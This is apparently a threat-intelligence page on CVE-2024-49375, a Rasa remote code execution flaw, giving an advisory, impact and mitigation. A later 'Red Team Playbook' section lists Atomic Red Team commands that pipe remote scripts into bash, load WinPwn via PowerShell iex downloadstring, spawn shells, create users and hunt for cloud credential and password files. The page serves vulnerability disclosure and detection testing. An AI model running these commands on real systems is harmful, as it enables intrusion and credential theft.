CVE-2024-49375
Overview
This vulnerability is a remote code execution flaw caused by insecure deserialization of maliciously crafted machine learning models in the Rasa framework. The root cause lies in the model loading mechanism within the HTTP API component, which improperly handles untrusted input allowing execution of arbitrary code. The affected feature is the Rasa instance's model loading functionality when the HTTP API is enabled.
Vulnerability Description
Open source machine learning framework. A vulnerability has been identified in Rasa that enables an attacker who has the ability to load a maliciously crafted model remotely into a Rasa instance to achieve Remote Code Execution. The prerequisites for this are: 1. The HTTP API must be enabled on the Rasa instance eg with `--enable-api`. This is not the default configuration. 2. For unauthenticated RCE to be exploitable, the user must not have configured any authentication or other security controls recommended in our documentation. 3. For authenticated RCE, the attacker must posses a valid authentication token or JWT to interact with the Rasa API. This issue has been addressed in rasa version 3.6.21 and all users are advised to upgrade. Users unable to upgrade should ensure that they require authentication and that only trusted users are given access.
Impact
An attacker with network access to a Rasa instance with the HTTP API enabled can execute arbitrary code remotely by loading a malicious model. If no authentication is configured, the attack requires no credentials; otherwise, a valid authentication token or JWT is necessary. Successful exploitation can lead to full system compromise, data breach, or service disruption. The CVSS vector indicates network attack vector (AV:N), high complexity (AC:H), no privileges required (PR:N), and complete impact on confidentiality, integrity, and availability (C:H/I:H/A:H).
Solution
Users should upgrade Rasa to version 3.6.21 or later as per the advisory at https://github.com/RasaHQ/rasa-pro-security-advisories/security/advisories/GHSA-cpv4-ggrr-7j9v. For those unable to upgrade immediately, it is recommended to disable the HTTP API or enforce strict authentication and access controls to restrict model loading to trusted users only.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability identified within the open-source machine learning framework Rasa presents a significant risk due to its potential for enabling remote code execution (RCE). This flaw arises from the ability of an attacker to load a maliciously crafted model into a Rasa instance, provided certain conditions are met. The primary requirement is that the HTTP API must be enabled, which is not the default setting. Additionally, the absence of authentication or other security measures increases the risk of exploitation, allowing unauthorized users to execute arbitrary code on the server. For scenarios where authentication is implemented, an attacker must possess a valid authentication token or JSON Web Token (JWT) to exploit the vulnerability, thereby complicating the attack vector but not eliminating the risk.
Exploitation of this vulnerability can occur through various attack vectors. If the HTTP API is enabled without proper authentication, an attacker could remotely upload a malicious model, leading to RCE without any prior access controls. In environments where authentication is in place, the attacker would need to first gain access to a valid token, which could be achieved through phishing, credential stuffing, or other means of token theft. Once access is obtained, the attacker can leverage the same mechanism to upload and execute malicious code. This dual-path exploitation scenario underscores the importance of robust security practices, as both authenticated and unauthenticated access can lead to severe consequences.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely on Rasa for deploying machine learning models in production environments. Successful exploitation could lead to unauthorized access to sensitive data, manipulation of machine learning models, or even complete system compromise. The business risks associated with such an incident include reputational damage, financial losses, regulatory penalties, and the potential for data breaches. Organizations that fail to address this vulnerability may find themselves at a competitive disadvantage, as trust in their systems and services diminishes in the eyes of customers and stakeholders.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the latest version of Rasa, which addresses the flaw. For those unable to upgrade immediately, implementing strong authentication mechanisms is crucial. This includes enforcing the use of secure tokens, limiting API access to trusted users, and regularly auditing access logs for any suspicious activity. Additionally, organizations should conduct penetration testing and vulnerability assessments to identify and remediate potential weaknesses in their deployment. Employing a defense-in-depth strategy that includes network segmentation, intrusion detection systems, and application firewalls can further reduce the risk of exploitation.
In conclusion, the vulnerability within the Rasa framework highlights the critical need for organizations to maintain vigilance in their security practices, especially when deploying machine learning solutions. By understanding the technical details, potential attack vectors, and real-world implications, organizations can take proactive steps to safeguard their systems. The emphasis on upgrading, implementing strong authentication controls, and maintaining a robust security posture is essential to mitigate the risks associated with this and similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a marked escalation in the exploit landscape for CVE-2024-49375, driven by the emergence of publicly available proof-of-concept code on GitHub. This development has directly contributed to a significant increase in the Exploit Prediction Scoring System (EPSS) score, reflecting heightened likelihood of exploitation attempts. Our telemetry indicates that while exploitation activity is not yet widespread, the availability of ready-to-use exploit tools lowers the barrier for adversaries, increasing the risk of remote code execution attacks against improperly secured Rasa instances. This shift elevates the threat level from a theoretical concern to a more imminent operational risk, particularly for environments with enabled HTTP APIs lacking robust authentication controls. Defenders should recognize that the vulnerability is moving beyond proof-of-concept into active exploitation phases, underscoring the urgency for vigilant monitoring and rapid response capabilities.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
lierbushiwo/Rasa-cve-exp
CVE-2024-49375、CVE-2021-42556、CVE-2021-41127
|
lierbushiwo | 0 | 0 | 2026-06-03 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-49375 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/RasaHQ/rasa-pro-security-advisories/security/advisories/GHSA-cpv4-ggrr-7j9v |